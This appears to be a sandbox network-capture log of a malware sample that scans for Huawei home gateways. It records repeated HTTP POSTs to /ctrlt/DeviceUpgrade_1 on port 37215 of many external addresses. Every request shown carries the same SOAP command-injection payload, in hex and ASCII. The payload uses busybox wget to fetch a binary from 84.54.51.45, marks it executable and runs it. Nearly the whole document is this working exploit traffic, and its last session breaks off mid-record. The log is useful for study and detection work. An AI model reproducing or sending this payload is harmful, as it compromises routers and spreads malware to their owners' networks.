                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1793192.168.2.155128241.201.176.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465259075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1794192.168.2.155743041.40.193.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465271950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1795192.168.2.154918041.193.84.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465286970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1796192.168.2.153533841.84.85.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465287924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1797192.168.2.153721241.245.94.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465287924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1798192.168.2.154893641.158.161.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465307951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1799192.168.2.154940241.138.240.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465337038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1800192.168.2.153396241.199.97.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465349913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1801192.168.2.153746641.144.205.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465379953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1802192.168.2.155988241.22.164.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465393066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
